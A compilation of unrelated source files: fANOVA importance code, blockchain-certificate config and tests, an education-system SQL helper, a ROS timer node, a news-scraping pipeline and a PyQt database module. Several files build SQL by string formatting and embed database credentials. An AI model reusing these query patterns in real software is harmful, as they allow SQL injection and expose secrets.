self._y = deepcopy(y)
self.n_features = X.shape[1]
self._search_spaces = self._get_search_spaces(search_spaces)
self._columns = list(self._X.columns.values.astype(str))
self._f = _Fanova(
n_trees=n_tree,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_samples_split=min_samples_split,
seed=seed)
assert self.n_features >= degree, f'degree must be less than or equal to feature dimension. but degree:{degree}, n_features:{self.n_features}'
self._combination_of_features = self._listup_combination_of_features(degree=degree, n_features=self.n_features)
self._compute_importance()
def _get_search_spaces(
self,
search_spaces: Optional[np.ndarray]
) -> np.ndarray:
spaces = deepcopy(search_spaces)
if spaces is None:
spaces = np.column_stack([self._X.min().values, self._X.max().values])
assert self.n_features == spaces.shape[0], 'X must have same dimension of search_spaces'
assert spaces.shape[1] == 2, 'search_spaces requires [[MIN, MAX], ..., [MIN, MAX]] ndarray'
return spaces
def _listup_combination_of_features(self, degree: int, n_features: int) -> List[Tuple]:
features_indexes = list(range(n_features))
combinations = []
for i in range(1, 1 + degree):
combinations += list(itertools.combinations(features_indexes, i))
return combinations
def _compute_importance(self) -> None:
self._f.fit(X=self._X.values,
y=self._y.values.ravel(),
search_spaces=self._search_spaces,
column_to_encoded_columns=self._combination_of_features)
importances_value = [self._f.get_importance((i,))[0] for i in range(len(self._combination_of_features))]
importances_error = [self._f.get_importance((i,))[1] for i in range(len(self._combination_of_features))]
name_list = []
for comb_name in self._combination_of_features:
name = ''
for i in comb_name:
name += list(self._columns)[i] + ' '
name_list.append(name[:-1])
self._importances = pd.DataFrame(
{
'importance_value': importances_value,
'importance_error': importances_error,
'marginal_feature_name': name_list
})
@property
def importances(self) -> pd.DataFrame:
return self._importances
def get_importances(self, features: Tuple[int, ...]) -> Tuple[float, float]:
"""Use to calculate the product set.
Args:
features (Tuple[int, ...]): The input is get_importances((0,1)), the contribution of the product set of the 0th index and 1st index features is calculated.
Returns:
Tuple[float, float]: return (importance_value, importance_error) tuple.
"""
return self._f.get_importance(features)
class _Fanova(object):
def __init__(
self,
n_trees: int,
max_depth: int,
min_samples_split: Union[int, float],
min_samples_leaf: Union[int, float],
seed: Optional[int],
) -> None:
self._forest = RandomForestRegressor(
n_estimators=n_trees,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
random_state=seed,
)
self._trees: Optional[List[ForestTree]] = None
self._variances: Optional[Dict[Tuple[int, ...], np.ndarray]] = None
self._column_to_encoded_columns: Optional[List[np.ndarray]] = None
def fit(
self,
X: np.ndarray,
y: np.ndarray,
search_spaces: np.ndarray,
column_to_encoded_columns: List[Tuple],
) -> None:
assert X.shape[0] == y.shape[0]
assert X.shape[1] == search_spaces.shape[0]
assert search_spaces.shape[1] == 2
self._forest.fit(X, y)
self._trees = [ForestTree(e.tree_, search_spaces) for e in self._forest.estimators_]
self._column_to_encoded_columns = column_to_encoded_columns
self._variances = {}
if all(tree.variance == 0 for tree in self._trees):
# If all trees have 0 variance, we cannot assess any importances.
# This could occur if for instance `X.shape[0] == 1`.
raise RuntimeError("Encountered zero total variance in all trees.")
def get_importance(self, features: Tuple[int, ...]) -> Tuple[float, float]:
# Assert that `fit` has been called.
assert self._trees is not None
assert self._variances is not None
self._compute_variances(features)
fractions: Union[List[float], np.ndarray] = []
for tree_index, tree in enumerate(self._trees):
tree_variance = tree.variance
if tree_variance > 0.0:
fraction = self._variances[features][tree_index] / tree_variance
fractions = np.append(fractions, fraction)
fractions = np.asarray(fractions)
return float(fractions.mean()), float(fractions.std())
def _compute_variances(self, features: Tuple[int, ...]) -> None:
assert self._trees is not None
assert self._variances is not None
assert self._column_to_encoded_columns is not None
if features in self._variances:
return
for k in range(1, len(features)):
for sub_features in itertools.combinations(features, k):
if sub_features not in self._variances:
self._compute_variances(sub_features)
raw_features = np.concatenate([self._column_to_encoded_columns[f] for f in features])
variances = np.empty(len(self._trees), dtype=np.float64)
for tree_index, tree in enumerate(self._trees):
marginal_variance = tree.get_marginal_variance(raw_features)
# See `fANOVA.__compute_marginals` in https://github.com/automl/fanova/blob/master/fanova/fanova.py.
for k in range(1, len(features)):
for sub_features in itertools.combinations(features, k):
marginal_variance -= self._variances[sub_features][tree_index]
variances[tree_index] = np.clip(marginal_variance, 0.0, np.inf)
self._variances[features] = variances
``` |
{
"source": "johnykkwan/cert-core",
"score": 2
} |
#### File: cert_core/cert_store/config.py
```python
import os
import configargparse
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def create_config():
p = configargparse.getArgumentParser(default_config_files=[os.path.join(BASE_DIR, 'conf_test.ini'),
os.path.join(BASE_DIR, 'conf_local.ini'),
os.path.join(BASE_DIR, 'conf.ini'),
'/etc/cert-issuer/conf.ini'])
p.add('-c', '--my-config', required=False, is_config_file=True, help='config file path')
p.add_argument('--mongodb_uri', default='mongodb://localhost:27017/test', type=str, env_var='MONGODB_URI',
help='Mongo connection string, including db containing certificates')
p.add_argument('--cert_store_type', type=str, help='type of key value store to use for Cert Store')
p.add_argument('--cert_store_path', type=str, help='path to file system Cert Store')
p.add_argument('--v1_aware', action='store_true', help='Whether to support v1 certs')
args, _ = p.parse_known_args()
return args
parsed_config = None
def get_config():
global parsed_config
if parsed_config:
return parsed_config
parsed_config = create_config()
return parsed_config
```
#### File: cert-core/tests/test_model.py
```python
import json
import unittest
from cert_core import BlockcertVersion
from cert_core import Chain
from cert_core.cert_store import helpers
from cert_core.cert_model import model
from cert_core.cert_model.model import ProofType, parse_date
from cert_core.cert_model.model import SignatureType
class TestModel(unittest.TestCase):
def test_detect_version_v1_1(self):
with open('data/1.1/sample_signed_cert-1.1.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
version = model.detect_version(certificate_json)
self.assertEqual(version, BlockcertVersion.V1_1)
def test_detect_version_v1_2(self):
with open('data/1.2/609c2989-275f-4f4c-ab02-b245cfb09017.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
version = model.detect_version(certificate_json)
self.assertEqual(version, BlockcertVersion.V1_2)
def test_to_certificate_model_v1_1(self):
with open('data/1.1/sample_signed_cert-1.1.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
txid = '1703d2f5d706d495c1c65b40a086991ab755cc0a02bef51cd4aff9ed7a8586aa'
certificate_model = model.to_certificate_model(certificate_json, txid, certificate_bytes)
self.assertEqual(certificate_model.issuer.id,
'http://www.blockcerts.org/mockissuer/issuer/got-issuer.json')
self.assertEqual(certificate_model.txid,
'1703d2f5d706d495c1c65b40a086991ab755cc0a02bef51cd4aff9ed7a8586aa')
self.assertEqual(certificate_model.title, 'Game of Thrones Character')
self.assertEqual(certificate_model.description,
'This certifies that the named character is an official Game of Thrones character.')
self.assertEqual(certificate_model.uid, '75857d18-0e1c-4933-b4c8-33484396e06b')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'Game of thrones characters')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2016-08-29 00:00:00+00:00'))
# self.assertEqual(certificate_model.blockcert_signature, None)
self.assertIsNotNone(certificate_model.signature_image[0].image)
self.assertEqual(certificate_model.signatures[0].signature_type, SignatureType.signed_content)
self.assertEqual(certificate_model.signatures[1].signature_type, SignatureType.signed_transaction)
self.assertIsNone(certificate_model.signatures[1].merkle_proof)
self.assertEqual(certificate_model.chain, Chain.bitcoin_testnet)
def test_to_certificate_model_v1_2(self):
"""
Note this is a bitcoin_mainnet certificate with different uid
:return:
"""
with open('data/1.2/609c2989-275f-4f4c-ab02-b245cfb09017.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
certificate_model = model.to_certificate_model(certificate_json)
self.assertEqual(certificate_model.version, BlockcertVersion.V1_2)
self.assertEqual(certificate_model.issuer.id,
'http://www.blockcerts.org/mockissuer/issuer/got-issuer_live.json')
self.assertEqual(certificate_model.txid,
'8623beadbc7877a9e20fb7f83eda6c1a1fc350171f0714ff6c6c4054018eb54d')
self.assertEqual(certificate_model.title, 'Game of Thrones Character')
self.assertEqual(certificate_model.description,
'This certifies that the named character is an official Game of Thrones character.')
self.assertEqual(certificate_model.uid, '609c2989-275f-4f4c-ab02-b245cfb09017')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'Game of thrones issuer')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2016-10-03 00:00:00+00:00'))
self.assertIsNotNone(certificate_model.signature_image[0].image)
self.assertEqual(certificate_model.chain, Chain.bitcoin_mainnet)
def test_to_proof(self):
with open('data/1.2/receipt.json') as receipt_file:
receipt_json = json.load(receipt_file)
proof = model.parse_merkle_proof(receipt_json['receipt'])
self.assertEqual(proof.target_hash, '2d3d0f49416587c4ce14c05d47c4193f0da3dd56f7244a568b06484cb8d2fe78')
self.assertEqual(proof.merkle_root, '3268386feb897f6cab2c100a0edb6f66b4bb3a8745e3e3e8a54b1cb7151a6d96')
self.assertEqual(proof.proof_type, ProofType.merkle_proof_2017)
def test_to_v2_proof(self):
with open('data/2.0/receipt.json') as receipt_file:
receipt_json = json.load(receipt_file)
proof = model.parse_merkle_proof(receipt_json)
self.assertEqual(proof.target_hash,
'c9ead76a54426b4ce4899bb921e48f5b55ea7592e5cee4460c86ebf4698ac3a6')
self.assertEqual(proof.merkle_root,
'68f3ede17fdb67ffd4a5164b5687a71f9fbb68da803b803935720f2aa38f7728')
self.assertEqual(proof.proof_type, ProofType.merkle_proof_2017)
def test_to_certificate_model_v2_alpha(self):
with open('data/2.0-alpha/8e0b8a28-beff-43de-a72c-820bc360db3d.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
certificate_model = model.to_certificate_model(certificate_json)
self.assertEqual(certificate_model.version, BlockcertVersion.V2_ALPHA)
self.assertEqual(certificate_model.issuer.id,
'https://www.blockcerts.org/blockcerts_v2_alpha/samples/issuer_testnet.json')
self.assertEqual(certificate_model.txid,
'08e205566662b97f149ad677649bbb94ebc2f46c0ac72bc7c9b57d2d207015f4')
self.assertEqual(certificate_model.title, 'This is the certificate title')
self.assertEqual(certificate_model.description, 'This is the display description of the certificate.')
self.assertEqual(certificate_model.uid, 'urn:uuid:8e0b8a28-beff-43de-a72c-820bc360db3d')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'Issuer Institution Name')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2017-05-01 00:00:00+00:00'))
self.assertEqual(certificate_model.chain, Chain.bitcoin_testnet)
def test_to_certificate_model_v2(self):
with open('data/2.0/bbba8553-8ec1-445f-82c9-a57251dd731c.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
certificate_model = model.to_certificate_model(certificate_json)
self.assertEqual(certificate_model.version, BlockcertVersion.V2)
self.assertEqual(certificate_model.issuer.id,
'https://www.blockcerts.org/samples/2.0/issuer-testnet.json')
self.assertEqual(certificate_model.txid,
'd75b7a5bdb3d5244b753e6b84e987267cfa4ffa7a532a2ed49ad3848be1d82f8')
self.assertEqual(certificate_model.title, 'Certificate of Accomplishment')
self.assertEqual(certificate_model.description, 'Lorem ipsum dolor sit amet, mei docendi concludaturque ad, cu nec partem graece. Est aperiam consetetur cu, expetenda moderatius neglegentur ei nam, suas dolor laudem eam an.')
self.assertEqual(certificate_model.uid, 'urn:uuid:bbba8553-8ec1-445f-82c9-a57251dd731c')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'University of Learning')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2017-06-29T14:58:57.461422+00:00'))
self.assertEqual(certificate_model.chain, Chain.bitcoin_testnet)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JohnyLi/Education_System",
"score": 3
} |
#### File: src/Config/Config.py
```python
import configparser
#ๆญค็ฑป็จไบๅฏนconfig.ini่ฟ่กๆไฝๅๆฅ่ฏข
#---------------------------------------------ๅ
จๅฑ้
็ฝฎ--------------------------------------------#
config_path="Config/config.ini"
#---------------------------------------------ๅ
จๅฑ้
็ฝฎ--------------------------------------------#
class Aconfig:
def __init__(self):
self.__config = configparser.ConfigParser()
self.__config.read(config_path)
def getvalue(self,section,key):
value=self.__config.get(section,key)
return value
def getsection(self,section):
section = self.__config.items(section)
return section
```
#### File: src/SQL_libarary/SQL_Infor.py
```python
from Config.Link_db import *
from Config.Config import *
from SQL_libarary.SQL_Account import *
from SQL_libarary.SQL_Course import *
import time
#ๆญค็ฑปไฝไธบๅฏนInformation่กจ่ฟ่กๆไฝ็sqlๆนๆณ็libarary
#Information่กจไธบๅญๆพuseridใtelephoneใsexๅborn็่กจ
#---------------------------------------------ๅ
จๅฑ้
็ฝฎ--------------------------------------------#
table_section="table"
#table name config
myconfig=Aconfig()#่ทๅconfig้
็ฝฎ
InforTable=myconfig.getvalue(table_section,"InformationTable") #่ทๅInformation่กจๅ
AccountTable=myconfig.getvalue(table_section,"AccountTable") #่ทๅAccount่กจๅ
CourseTable=myconfig.getvalue(table_section,"CourseTable") #่ทๅCourse่กจๅ
LogTable=myconfig.getvalue(table_section,"LogTable") #่ทๅๆฅๅฟ่กจๅ
#---------------------------------------------ๅ
จๅฑ้
็ฝฎ--------------------------------------------#
class SQL_Infor:
# ๅๅงๅๅจ็ฑปไธญๅจๅญๆฐๆฎๅบ่ฟๆฅ
def __init__(self, db):
self.__db = db # ่ทๅไธdatabase็่ฟๆฅ็class
# ๅพๆฅๅฟไธญๅขๅ ไธๆกๆฅๅฟ
def insertlog(self, username, operation):
Time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
sql = "insert into %s (userid,operation,Time) " \
"select userid , '%s' , '%s' from %s where username='%s' " % (
LogTable, operation, Time, AccountTable, username)
status = self.__db.update(sql)
return status
#่ทๅๅ
จ้จไฟกๆฏ
def GetAllInfor(self):
sql = " select * from %s" % (InforTable)
data = self.__db.select(sql)
return data
# ๆ นๆฎ็จๆทๅ่ทๅๅฏนๅบ็ไฟกๆฏ
def GetInfor(self, username):
sql = " select username,telephone,sex,born from %s i join %s a on a.userid=i.userid " \
"where a.username='%s'" % (InforTable,AccountTable, username)
data = self.__db.select(sql)
if (data != False):
return data
else:
return None
# ๆ นๆฎ็จๆทๅ่ทๅๅ
ถid
def GetUserid(self,username):
sql = "select userid from %s where username='%s' " %(AccountTable,username)
data = self.__db.select(sql)
return data[0][0]
#ๆดๆฐ็จๆทไฟกๆฏ
def UpdateInfor(self,username,telephone,sex,born):
userid=self.GetUserid(username)
sql= "update %s set telephone='%s',sex='%s',born='%s' where userid='%s'" \
% (InforTable,telephone,sex,born ,userid)
status = self.__db.update(sql)
self.insertlog(username,"ๆดๆฐ็จๆทไฟกๆฏ")
return status
#่ทๅๆๆ้ไธ็ๆๆ็จๆท
def GetUserBYprivilege(self,privilege):
sql = "select i.userid,username,born,sex,telephone,privilege from %s i join %s a on a.userid=i.userid where privilege=%s"\
%(InforTable,AccountTable,privilege)
data = self.__db.select(sql)
result=[]
for i in data:
mydict={'userid':i[0],'username':i[1],'born':i[2],'sex':i[3],'telephone':i[4],'privilege':i[5]}
result.append(mydict)
return result
#ๅ ้ค่ฏฅๆๅธๆๆไฟกๆฏ
def DeleteAll_teacher(self,username):
Account=SQL_Account(self.__db)
Course = SQL_Course(self.__db)
userid=Account.getIDbyName(username)
sql="Delete from %s where userid=%s" %(InforTable,userid)
status = self.__db.update(sql)
Courselist=Course.SearchCourse_2(username)
for i in Courselist:
courseid=Course.getCourseID(i['name'])
testlist=Course.getCourseTest(courseid)
for testid in testlist:
sql = "Delete from %s where testid=%s" % (Test_Course_Table, testid)
status = self.__db.update(sql)
sql = "Delete from %s where testid=%s" % (Student_Test_Table, testid)
status = self.__db.update(sql)
sql="Delete from %s where userid=%s" %(CourseTable,userid)
status = self.__db.update(sql)
Account.DeleteAccount(username)
return True
#ๅ ้ค่ฏฅๅญฆ็ๆๆไฟกๆฏ
def DeleteAll_student(self,username):
Account = SQL_Account(self.__db)
userid = Account.getIDbyName(username)
sql = "Delete from %s where studentid=%s" %(Student_Test_Table,userid)
status = self.__db.update(sql)
sql = "Delete from %s where studentid=%s" % (Student_Course_Table, userid)
status = self.__db.update(sql)
Account.DeleteAccount(username)
return True
#ๅขๅ ไฟกๆฏ
def InsertInfor(self,username,password,telephone,sex,born,privilege):
Account = SQL_Account(self.__db)
Account.InsertAccount(username,password,privilege)
userid=Account.getIDbyName(username)
sql = "Insert into %s values(%s,'%s','%s','%s')"%(InforTable,userid,telephone,sex,born)
status = self.__db.update(sql)
return True
``` |
{
"source": "JohnyLn/ROS_Courses",
"score": 3
} |
#### File: src/pkg1/timepub.py
```python
import rospy
import time
from std_msgs.msg import String, Float64, Int32
def timer():
rospy.init_node("timer")
timer_pub = rospy.Publisher("/time",String, queue_size=10)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
heure = str(rospy.get_rostime().secs)
timer_pub.publish(heure)
rate.sleep()
if __name__ == '__main__':
try:
timer()
except rospy.ROSInterruptException:
print("End")
``` |
{
"source": "johnyluyte/scrapy-demo-appledaily",
"score": 3
} |
#### File: tutorial/tutorial/pipelines.py
```python
import re
import MySQLdb
# 1. ่ซๅ
ๅฐ settings.py ๅฐไฝ ่ฆ็จ็ pipeline function ๅ ้ฒๅป ITEM_PIPELINES = {} ่ฃก้ข
class AppleDailyPipeline(object):
def process_item(self, item, spider):
if(len(item['title'])!=0):
# ๅฐ่ณๆ่ฝ็บ UTF-8 ๆ ผๅผ
# ้่ฃๅชๆฏ็บไบ่ฎ demo print ๆๆฏ่ผๆผไบฎ๏ผๅฏฆ้ไธไธ้็พๅจๅ่ฝๆ๏ผ่ฆๅฒๅญ่ณๆๆๅ่ฝๅณๅฏ
# http://blog.chunnorris.cc/2015/04/unicode.html
title = item['title'][0].encode('UTF-8')
url = item['url'][0].encode('UTF-8')
category = item['category'][0].encode('UTF-8')
time = item['time'][0].encode('UTF-8')
# 2. ๅฐ่ณๆไฝ่็
# ่ๆ็้ป้ฑ็่จ้ๅจๅ
ถๆจ้กไนๅพ็จๆฌ่ๅ
ง๏ผไพๅฆไธ้ข้ๅๆฐ่
# ๆฟไธๅฐ็ผ็ฅจๅญๆ น่ฏใๅฅงๅฎขๆๆกๆ็ค(920)
# ็้ป้ฑ็ๅฐฑๆฏ 920
# ๆๅไฝฟ็จๅ
งๅปบ็ re ๅฝๅผๅบซไพ่็ Regex
regex_pattern = r"\((\d+)\)"
# ้้ไฝฟ็จ regex ็่ชๆณ๏ผๆ่่ถฃ่ชๅทฑไธ็ถฒๆฅ
clicks = re.findall(regex_pattern, title)
# ๅ re.findall ๅๅณ strings[]๏ผ้่ฃๆๅๅช่ฆ็ฌฌไธๅ element
clicks = clicks[0]
# ๆฅ่ไนๅฐ title ๅ่็
title = re.findall(r"(.+)\(", title)[0]
# ่็ url
url = "http://www.appledaily.com.tw/realtimenews/section/new" + url
print "\033[1;33m [AppleDailyPipeline]"
print title
print url
print category
print time
print clicks
print "\033[m"
self.upload_to_database(title, url, category, time, clicks)
return item
# 3. ไฝฟ็จ MySQLdb ๅฝๅผๅบซไธๅณ่ณ่ณๆๅบซ
# ๅฆๆๆฒๆ MySQLdb ็่ฉฑ่ซๅ
ๅฎ่ฃ
# http://www.tutorialspoint.com/python/python_database_access.htm
# $ pip install MySQL-python
# ่จๅพไฝฟ็จ virtualenv๏ผๅฆๆ้ๆฒ็จ็่ฉฑใ้็ถ็พๅจๆ่ฌๅฏ่ฝๆ้ปๆ XD
def upload_to_database(self, title, url, category, time, clicks):
conn = MySQLdb.connect(
# ่จป๏ผ่ซๆ้้็่ณๆๆนๆไฝ ็่ณๆๅบซ่จญๅฎ๏ผๆ็่ณๆๅบซๆๆไฝๅคไพ IP ๆไปฅไฝ ๆ้ฃไธไธไพ
host = "172.16.31.10",
db = "chunnorr_apple",
user = "chunnorr_apple",
passwd = "<PASSWORD>",
charset = "utf8",
use_unicode = True,
)
cursor = conn.cursor()
cursor.execute(
# ๆๅ
ฅๅๅๆๅๆๅๅฎๆไธฆ่็้็้ ปๆๆฅๅ ฑ่ณๆ
"INSERT INTO `table_news` VALUES('" + title + "','" + url + "','" + category + "','" + time + "','" + clicks + "');"
)
conn.close()
# ไปฅ้ๅไพๅญไพ่ฌ๏ผ้ๅ็จๅผๆ็ๅพๅทฎ๏ผๅ ็บ DB ไฝ I\O ็ overhead ๅพๅคง๏ผๆๅๆ่ฉฒ็กๅฏ่ฝ็ๆๆๆ่ณๆ้ฝ่็ๅฎๅพ๏ผไฝฟ็จไธๆฌก DB I/O ๅ
จ้จ่็ๅฅฝ๏ผ่้ๅ้ๆจฃไธๅไธๅไฝ DB I/Oใ
# ไฝ้่ฃๅชๆฏๅฑ็คบ scrapy ็ pipeline ๅ็จๆณ๏ผๅฐฑไธๆทฑ็ฉถใ
``` |
{
"source": "johnymachine/csv2db",
"score": 2
} |
#### File: src/app/database.py
```python
from PyQt5.QtCore import pyqtSlot, pyqtSignal, QThread, QMutex, QMutexLocker
import psycopg2
from datetime import datetime
import atexit
import json
REMOTE = {
'host': '172.16.17.32',
'database': 'rdb2015_danielmadera',
'user': 'student',
'password': '<PASSWORD>'
}
LOCAL = {
'host': '127.0.0.1',
'database': 'rdb2015_danielmadera',
'user': 'postgres',
'password': '<PASSWORD>'
}
def connect(location=LOCAL):
"""Opens and returns a database connection."""
conn = psycopg2.connect(**location)
with conn.cursor() as cur:
cur.execute("set search_path to 'rdb'")
conn.commit()
return conn
with open("database.json", 'r') as stream:
conn = connect(json.load(stream))
def get_devices():
"""Retrieves all devices from database."""
sql = 'select "serial_number", "deviation", "description" from "devices"'
with conn.cursor() as cur:
cur.execute(sql)
return cur.fetchall()
def remove_device(serial_number):
sql = 'delete from "devices" where "serial_number" = (%s)'
with conn.cursor() as cur:
cur.execute(sql, (serial_number,))
conn.commit()
def get_blocks(filter_=None):
sql = 'select "id", "description" from "blocks" where "id" in ({0}) order by "id"'
subquery = 'select distinct "block_id" from "measurements_view"'
with conn.cursor() as cur:
cur.execute(sql.format(subquery + filter_to_sql(cur, filter_)))
return cur.fetchall()
def remove_block(id_):
sql = 'delete from "blocks" where "id" = (%s)'
with conn.cursor() as cur:
cur.execute(sql, (id_,))
conn.commit()
def get_units():
sql = 'select "unit" from "units"'
with conn.cursor() as cur:
cur.execute(sql)
return cur.fetchall()
def get_measurements(filter_=None, offset=0, limit=20):
sql_begin = 'select "created" at time zone \'utc\', "value1", "value2", "difference", \
"device_description", "device_deviation" from \
"measurements_view"'
with conn.cursor() as cur:
sql = sql_begin + filter_to_sql(cur, filter_)
sql = sql + cur.mogrify('order by "created" desc offset %s limit %s',
(offset, limit)).decode('utf-8')
cur.execute(sql)
return cur.fetchall()
def get_measurements_count(filter_=None, *args):
sql = 'select count(1) from "measurements_view"'
with conn.cursor() as cur:
cur.execute(sql + filter_to_sql(cur, filter_))
return cur.fetchone()[0]
def get_logs(filter_=None, offset=0, limit=20):
sql_begin = 'select "created" at time zone \'utc\', "operation", "tablename", \
"description" from "logs"'
with conn.cursor() as cur:
sql = sql_begin + filter_to_sql(cur, filter_)
sql = sql + cur.mogrify('order by "created" desc offset %s limit %s',
(offset, limit)).decode('utf-8')
cur.execute(sql)
return cur.fetchall()
def filter_to_sql(cur, filter_):
def join_conditions(original, additional, operator='and'):
additional = ' ' + additional + ' '
if not original:
return additional
return original + ' ' + operator + ' ' + additional
if not filter_:
return ''
conditions = ''
if 'operation' in filter_:
additional = cur.mogrify('"operation" = %s', (filter_['operation'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'tablename' in filter_:
additional = cur.mogrify('"tablename" = %s', (filter_['tablename'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'block' in filter_:
additional = cur.mogrify('block_id = %s', (filter_['block'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'device' in filter_:
additional = cur.mogrify('serial_number = %s', (filter_['device'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'unit' in filter_:
additional = cur.mogrify('unit = %s', (filter_['unit'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'start_datetime' in filter_ and 'end_datetime' in filter_:
additional = cur.mogrify('created between %s and %s',
(filter_['start_datetime'], filter_['end_datetime'],)).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'loc_x' in filter_ and 'loc_tol' in filter_:
additional = cur.mogrify('loc_x between %s and %s',
(float(filter_['loc_x']) - float(filter_['loc_tol']),
float(filter_['loc_x']) + float(filter_['loc_tol']))).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'loc_y' in filter_ and 'loc_tol' in filter_:
additional = cur.mogrify('loc_y between %s and %s',
(float(filter_['loc_y']) - float(filter_['loc_tol']),
float(filter_['loc_y']) + float(filter_['loc_tol']))).decode('utf-8')
conditions = join_conditions(conditions, additional)
if 'deviated_values' in filter_ and \
filter_['deviated_values'] == True:
additional = 'difference > unit_deviation'
conditions = join_conditions(conditions, additional)
return ' where ' + conditions
def import_data(data):
"""Performs multiple insert of data."""
sql = 'insert into rdb."raw_data_view"("created", "unit", "location_id", \
"longitude", "latitude", "location_description", "value1", \
"value2", "unit_deviation", "serial_number", "device_deviation", "device_description", \
"block_id", "block_description") values '
with conn.cursor() as cur:
args_str = ','.join(_get_import_values_string(cur, row) for row in data)
cur.execute(sql + args_str)
conn.commit()
def _get_import_values_string(cur, row):
row[0] = datetime.utcfromtimestamp(int(row[0]))
return cur.mogrify("(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)",
row).decode('utf-8')
def export_data(filename, filter_=None):
"""Exports all raw_data."""
subquery = """
select (select round(extract(epoch from "created" at time zone 'utc'))),\
"unit", "location_id", \
"longitude", "latitude", "location_description", "value1", \
"value2", "unit_deviation", "serial_number", "device_deviation", "device_description", \
"block_id", "block_description"
from rdb."raw_data_view"
"""
query = "COPY ({0}) TO STDOUT WITH CSV DELIMITER ';'"
with conn.cursor() as cur:
subquery = subquery + filter_to_sql(cur, filter_)
query = query.format(subquery)
with open(filename, 'w') as f:
cur.copy_expert(query, f)
def execute(function, callback=None, *args, **kwargs):
if callable(function):
queue.append(
{'function': function, \
'callback': callback, \
'args': args, \
'kwargs': kwargs})
_startExecution()
def _startExecution():
if thread.done and queue:
function = queue[0]['function']
args = queue[0]['args']
kwargs = queue[0]['kwargs']
thread.execute(function, *args, **kwargs)
@pyqtSlot(dict)
def _on_thread_executed(dict_):
callback = queue[0]['callback']
del queue[0]
_startExecution()
if callable(callback):
callback(dict_['returnValue'])
class FunctionThread(QThread):
executed = pyqtSignal(dict)
def __init__(self, parent=None):
super(FunctionThread, self).__init__(parent)
self.mutex = QMutex()
self.function = None
self.args = None
self.kwargs = None
self.returnValue = None
self.finished.connect(self.on_thread_finished)
self.done = True
def __del__(self):
self.wait()
def execute(self, function, *args, **kwargs):
locker = QMutexLocker(self.mutex)
self.function = function
self.args = args
self.kwargs = kwargs
self.done = False
self.start()
def run(self):
returnValue = self.function(*self.args, **self.kwargs)
self.mutex.lock()
self.returnValue = returnValue
self.mutex.unlock()
def on_thread_finished(self):
result = {'returnValue': self.returnValue}
self.done = True
self.executed.emit(result)
@atexit.register
def unload_module():
"""Close db connection when module is unloaded."""
conn.close()
thread = FunctionThread()
queue = []
thread.executed.connect(_on_thread_executed)
if __name__ == "__main__":
import sys
from PyQt5.QtCore import QCoreApplication
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
app = QCoreApplication(sys.argv)
print('before')
execute(get_blocks, print)
print('between')
execute(get_devices, print)
print('after')
app.exec_()
```
#### File: app/ui/filteringwidget.py
```python
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QPushButton, QLabel,
QDialog)
from copy import deepcopy
from datetime import timezone
from .filterdialog import FilterDialog
class FilteringWidget(QWidget):
filterChanged = pyqtSignal(dict)
@staticmethod
def filterToText(filter_):
def appendText(original, additional):
if not original:
return additional
return original + ', ' + additional
if not filter_:
return "(ลพรกdnรฝ)"
text = ""
if 'block' in filter_:
text = appendText(text, 'Skupina mฤลenรญ: %s' % filter_['block'])
if 'device' in filter_:
text = appendText(text, 'Pลรญstroj: %s' % filter_['device'])
if 'unit' in filter_:
text = appendText(text, 'Jednotka: %s' % filter_['unit'])
if 'start_datetime' in filter_:
text = appendText(text, 'Od: %s' % \
utc_to_local(filter_['start_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'end_datetime' in filter_:
text = appendText(text, 'Do: %s' % \
utc_to_local(filter_['end_datetime']).
strftime('%Y-%m-%d %H:%M:%S'))
if 'loc_x' in filter_:
try:
text = appendText(text, 'Lokace: (%s, %s, +-%s)' %
(filter_['loc_x'], filter_['loc_y'], filter_['loc_tol']))
except KeyError:
pass
if 'deviated_values' in filter_ and \
filter_['deviated_values'] == True:
text = appendText(text, 'Mimo odchylku')
return text
def __init__(self, parent=None):
super(FilteringWidget, self).__init__(parent)
self._filter = {}
self.label = QLabel(self)
self.label.setWordWrap(True)
